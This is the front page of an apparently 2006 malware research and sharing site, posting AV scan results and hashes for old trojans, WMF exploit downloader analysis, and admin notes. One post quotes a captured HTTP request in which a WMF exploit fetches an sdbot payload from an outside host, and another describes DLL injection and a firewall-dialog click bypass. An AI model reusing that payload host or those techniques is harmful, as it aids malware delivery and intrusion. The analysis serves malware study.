Skip navigation.
Home
WARNING: This site contains samples of live malware. Use at your own risk.

Trojan.Win32.Kuang

For love of the old school and keeping it real I've run some older malware through some modern AV/MW detection software. Interesting results:

MD5: 4ea8483c238bdb7fb8daea13b0b61530
SHA1: 9991b460b4724334828c4dac6ca1d3eabb06df3e

AntiVir
Found nothing
ArcaVir
Found nothing
Avast
Found nothing
AVG Antivirus
Found W95/Weird
BitDefender
Found nothing
ClamAV
Found nothing
Dr.Web
Found nothing
F-Prot Antivirus
Found nothing
Fortinet
Found nothing
Kaspersky Anti-Virus
Found Email-Flooder.Win32.Weirder (probable variant)
NOD32
Found nothing
Norman Virus Control

requests

| |

Hey all, ive been pretty busy with the new baby, however I do have a request.

Anyone have a copy of the WMF contruction kit?

Thanks :)

V.

Win32.Klone.b analysis

Just another downloader, fully reversed into C code. I've picked it up a few days ago and sent to AVs, so most of them have signatures by now:

MD5: ec9dfa116b8f41e3918ec45a26597495

AntiVir Found nothing
ArcaVir Found nothing
Avast Found nothing
AVG Antivirus Found Klone
BitDefender Found GenPack:Trojan.Downloader.Galapoper.A
ClamAV Found nothing
Dr.Web Found Trojan.Galapoper
F-Prot Antivirus Found nothing
Fortinet Found W32/KlonePacked.B-tr
Kaspersky Anti-Virus Found Packed.Win32.Klone.b
NOD32 Found probably a variant of Win32/TrojanDownloader.Small.AVT (probable variant)

More wmf files

| |

I have some wmf exploit files.

more win_wmf

| |

Thanks to seville we have more wmf stuff. These go out to a site and download a new file.
Heres some pretty pictures:



So sdbot05b.jpg gets turned into command.pif

GET /sdbot05b.jpg HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: charmedmadgic.free.fr
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Mon, 02 Jan 2006 05:24:45 GMT

Welcome to the newest Offensive Computing member

|

We had a healthy baby boy born this morning at 6:57am so I'll probably not be posting much for a little while.

Have a happy new year!!

V.

random adminsitration things

|

A couple of things:

To all my military / government visitors. I notice people visiting but not logging in. If you would like an account but don't want to go through the normal sign up process, or don't have a public email you can use, feel free to let me know and I'd be happy to set you up an account.

A general thing, the file upload is broken. I am working on fixing it but no luck so far. Basically when you go to upload a file and hit add you will see a bunch of errors. However if you scroll down and hit submit, it still uploads successfully regardless of the errors. People can also just email me and I will post for them / give credit. Zip everything and password proect it with "offensivecomputing" so it will send.

WMF original exploit files and analysis

These files compose downloader from the original WMF exploit posted on bugtraq. It is composed of two parts:

bumXXX.exe md5sum: FE3B1E317846E0F398AF27954DD09C93
tioXXX.dll md5sum: 2AE5ED3EDD6925D6117548CF1E9F3C52

tioXXX.dll is dropped by bumXXX.exe and used for DLL injection into spawned iexplore.exe for downloading additional components. It also tries to bypass firewalls by sending WM_LBUTTONDOWN/WM_LBUTTONUP messages to firewall confirmation dialog.

Also bumXXX.exe is packed with PE Compact, i just ran it and dumped it's memory image, and fixed IAT manually, the only PE Compact unpacker I found didn't work :/

100,000 Hits!

|

Sometime today we crossed the 100k hits mark!

Not bad for a couple of weeks time with only really 3 days being truly public.

Welcome to all the visitors.

Now about about contributing some analysis, signatures, etc. :)

V.

Should access to malware be:

Open and free to all
82% (154 votes)
restricted to a vetted list
17% (32 votes)
only available to A/V and badguys
1% (1 vote)
Total votes: 187